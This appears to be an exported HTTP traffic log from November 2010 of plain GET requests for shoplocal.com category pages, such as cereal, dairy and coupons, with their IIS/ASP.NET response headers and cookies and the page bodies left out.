<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cakes-pies.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:15 GMT Connection: close Content-Length: 114015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /category.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:18 GMT Connection: close Content-Length: 113872
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cereal.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:16 GMT Connection: close Content-Length: 165978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cheese-meats.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:55 GMT Connection: close Content-Length: 127011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cheese.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:36 GMT Connection: close Content-Length: 153065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cleaning-supplies.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:34 GMT Connection: close Content-Length: 182336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /clothing.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:16 GMT Connection: close Content-Length: 116567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /coffee-tea.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:51:17 GMT Connection: close Content-Length: 167316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cooking-oil.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:07 GMT Connection: close Content-Length: 92620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /coupons.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0&couponclippings=; expires=Tue, 20-Nov-2035 18:40:50 GMT; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:51 GMT Connection: close Content-Length: 55906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cream-cheese.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:23 GMT Connection: close Content-Length: 77658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /dairy.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:25 GMT Connection: close Content-Length: 172175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /deli.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:01 GMT Connection: close Content-Length: 157977
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /dessert-mixes-frosting.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:09 GMT Connection: close Content-Length: 165032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /eggs.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:21 GMT Connection: close Content-Length: 67078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /electronics.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:04 GMT Connection: close Content-Length: 118636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /flour-sugar.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:21 GMT Connection: close Content-Length: 96053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /formula.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:12 GMT Connection: close Content-Length: 75281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /juice.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:43 GMT Connection: close Content-Length: 162147
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /liquor.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:49 GMT Connection: close Content-Length: 150681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /milk.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:52 GMT Connection: close Content-Length: 79125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /muffins.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:44 GMT Connection: close Content-Length: 67734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /other-cleaning.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:29 GMT Connection: close Content-Length: 162445
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /prepared-foods.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:44 GMT Connection: close Content-Length: 155155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /sales.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:50 GMT Connection: close Content-Length: 34602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
